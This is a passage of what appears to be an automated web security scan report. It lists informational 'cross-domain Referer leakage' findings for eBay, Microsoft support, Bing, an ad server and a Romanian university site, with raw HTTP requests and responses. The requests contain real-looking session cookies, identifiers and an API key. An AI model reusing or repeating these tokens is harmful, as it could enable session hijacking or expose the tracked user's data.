Set-Cookie: dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
Set-Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
Set-Cookie: s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 20544
Date: Tue, 19 Jul 2011 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script></script><d
...[SNIP]...
</title><link rel="stylesheet" type="text/css" href="https://secureinclude.ebaystatic.com/v4css/z/ic/5i3fq334pyyxhijc5f3zqvjyc.css#GH-ZAM_RedesignSigninEbay_e731_13527566_en_US"><link rel="stylesheet" type="text/css" href="https://secureinclude.ebaystatic.com/v4css/z/il/u2dx44plymz1dfsknxx55os3q.css#SignInApp_SgnIn_e731_13527566_en_US"><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/e2/1kgeg22jaq0d3efjwymeoqcvm.js#SignInApp_SgnIn_e731_6_13527320_en_US"></script>
...[SNIP]...

20.39. http://srx.main.ebayrtm.com/rtm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srx.main.ebayrtm.com
Path:	/rtm

Issue detail

The page was loaded from a URL containing a query string:

http://srx.main.ebayrtm.com/rtm?RtmCmd&a=json&p=699:1595:973:974:825:827:829:813:283:280:433:876:912:1650:1651&ph=0:0:0:0:0:0:0:0:0:0:0:0:0:0:0&ev=0:0:0:0:0:0:0:0:0:1:0:0:0:0:0&g=adb7b0cb1300a0aa15432be3fe5c7984&uf=0&c=1H4sIAAAAAAAAAFVU32vbMBB%2BL%2FR%2FMGxPQ011OkmWAnoobQctNA1N1m0QMG6itqaNHWxnWSB%2F%2FE6Sl25Pd9%2F9%2BHT%2BTvKn%2BdZnt9v3DGwGMEY1Fia7m80zwQFOTzbC5o4Hy8FFzLn7JjLUPJs32zYT2bxavvm%2Byzq%2FRKmyid9lt77t%2FD777leBev%2FBpRxYNFyaSIngnqr6ZfRc1l1dbkbLZk1hQONAgxDRzx0gV8G11oHgubRWciF5zGKcCVA4xUcplMYELeLYYOWRQA8pC27my66p%2F47O2Mwv%2B6qpGX0Am2zXT77NmudjWrC7pu5fWfgWdv3L13022z71%2B41nD83y7XzabM4v3nvf1qMhPQ%2B5y6Ze%2Bpb6H31NIs%2F6svfn07b5VVGcfeg05C%2BrntjLrs8etv2rb5%2BbdsV%2B%2BrJlQT52Ve7JoQN3jFBqmZTrRHTny1Wzey%2FrVRfOWVXboCSa3LXrt%2FvyovtyerKsViTgYss50fFk1f8wqCNsUknlztqRtTEmj50xhUlbg05i3ASCoepUbMSwlGgQ8gTTPhB0gnBkR5Du682P66ti%2BnBzeR0jOBQTFQGRGzCaTg%2BXBpSjO8jTugVVfiZVIo6BXMVWyYerkRs3rDHNP%2Bzn31Aok9LF4an9ePckuGCRGycj5gOmmsVYkSqmOCPpxsAl58UZklcAF3oxFgWAJot5CMjFWHJyOLVZsjoPPYVQCqlHSgNQWC2USUAUEnMRedHayKuxEKgCozTK5DEWvJQlIg3k0XBmGBHd%2FcbXi6hBUhzp4U7LF%2F9Y%2Bd1N79cT%2F7sPgjkj0%2Fs2wzv%2F2Ds%2FaiG0daS1YsAkMGFRMuTCMG2ZHrCyTMXS%2BE6VgvxgDVdGHuj6WmPNAZUAjfYguVZc5JE2H34q6XYIlM7EuA74DxaR6JCcBAAA&ord=1311100529004&e=USC:1&z=10&bw=1065&bh=723&cg=3666b2e01300a47a44d622a6ffc19372&enc=UTF-8&v=4&rnc=1&cb=vjo.dsf.assembly.VjClientAssembler._callback0&_vrdm=1311100538345

The response contains the following link to another domain:

http://qu.ebay.com/survey?srvName=merchandising+%28merch1%29&variant_id=54252305&extparam=pageid%3d4340

Request

Response

20.40. https://support.discoverbing.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.discoverbing.com
Path:	/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://support.discoverbing.com/Default.aspx?&st=1&wfxredirect=1

The response contains the following links to other domains:

https://ssl.bing.com/rewards/dashboard
https://ssl.bing.com/rewards/faq/questions
https://ssl.bing.com/rewards/redeem

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 15:18:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scrx=1; expires=Thu, 19-Jul-2012 15:18:11 GMT; path=/
Set-Cookie: MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Vary: Accept-Encoding
Content-Length: 23919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
<li Depth="5"><a title="Your Account" href="https://ssl.bing.com/rewards/dashboard " target="_top" keys="85802_5 85802_4 " Depth="6">
...[SNIP]...
<li Depth="5"><a title="FAQ" href="https://ssl.bing.com/rewards/faq/questions" target="_top" keys="85803_5 85803_4 " Depth="6">
...[SNIP]...
<li Depth="5"><a title="Redemption Center" href="https://ssl.bing.com/rewards/redeem" target="_top" keys="86400_5 86400_4 " Depth="6">
...[SNIP]...

20.41. http://support.microsoft.com/common/international.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.microsoft.com
Path:	/common/international.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://support.microsoft.com/common/international.aspx?RDPATH=dm;en-us;select&target=assistance

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/335774571/direct/01/
http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No
http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCBAR_ENUS_ADR_BUYALL

Request

GET /common/international.aspx?RDPATH=dm;en-us;select&target=assistance HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083; sdninc=1; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; fmshb=0,1311089271820; .ASPXANONYMOUS=H-iLPrp8zAEkAAAAZDAyNDdkNzctZmNiMi00NmEzLTk4OWUtMzA2ZDBjMjc1ZTQ2ge2m6gPIvXC__FwJp8cro5hNcDg1

Response

20.42. http://support.microsoft.com/contactus/contact_microsoft_customer_serv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.microsoft.com
Path:	/contactus/contact_microsoft_customer_serv

Issue detail

The page was loaded from a URL containing a query string:

http://support.microsoft.com/contactus/contact_microsoft_customer_serv?&fr=1

The response contains the following link to another domain:

http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

GET /contactus/contact_microsoft_customer_serv?&fr=1 HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083; sdninc=1; .ASPXANONYMOUS=8NdXF7l8zAEkAAAAOTNmYmRiYmItMTcxOC00YjJmLTk5MjktM2JlNjA2ZTMzZGE4u0DvQbMalALZUZsx-OjG8HS4AQM1; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; fmshb=0,1311089271820

Response

20.43. http://support.microsoft.com/oas/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.microsoft.com
Path:	/oas/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://support.microsoft.com/oas/default.aspx?gprid=assistance

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/335774571/direct/01/
http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No
http://www.microsoftstore.com/store/msstore/home?WT.mc_id=SMCBAR_ENUS_ADR_BUYALL

Request

GET /oas/default.aspx?gprid=assistance HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/gp/csa
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; exitinfo=dm|1033|cu_selector|en-us||L_157327; sdninc=7; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078701004:ss=1311077969178; wedcsinc=4; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; fmshb=0,1311089574577; .ASPXANONYMOUS=wyYN87p8zAEkAAAAOTJlNjVlOGEtMGU1MS00OTgxLWExZjktMTk1MGM2NTY3ZTkzBrihrgf1hSvtYtVeJLdxlWPcstU1

Response

20.44. https://support.microsoft.com/oas/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.microsoft.com
Path:	/oas/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://support.microsoft.com/oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn

The response contains the following link to another domain:

https://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

GET /oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn HTTP/1.1
Host: support.microsoft.com
Connection: keep-alive
Referer: http://support.microsoft.com/oas/default.aspx?gprid=assistance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; sdninc=7; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078701004:ss=1311077969178; wedcsinc=4; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=wyYN87p8zAEkAAAAOTJlNjVlOGEtMGU1MS00OTgxLWExZjktMTk1MGM2NTY3ZTkzBrihrgf1hSvtYtVeJLdxlWPcstU1; fmshb=0,1311089576069; exitinfo=gp|1033|csa|en-us||L_174092; WFXSMCToken=1; AuthKey=SMC; WFXLANG=en-us

Response

20.45. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue

The response contains the following links to other domains:

http://map.media6degrees.com/orbserv/hbpix?pixId=3949&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
http://www.wtp101.com/admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1512
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<script type="text/javascript">
document.write
...[SNIP]...
</script>

<img width="0" height="0" src="http://map.media6degrees.com/orbserv/hbpix?pixId=3949&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<img width="0" height="0" src="http://www.wtp101.com/admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

</body>
...[SNIP]...

20.46. http://umfcluj.ro/Detaliu.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/Detaliu.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/Detaliu.aspx?t=Medicina-dentara-Oferta-educationala

The response contains the following links to other domains:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.netlogiq.ro/
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0
http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:36:38 GMT
Content-Length: 61593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutors</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Download</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutors</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Download</a>
...[SNIP]...
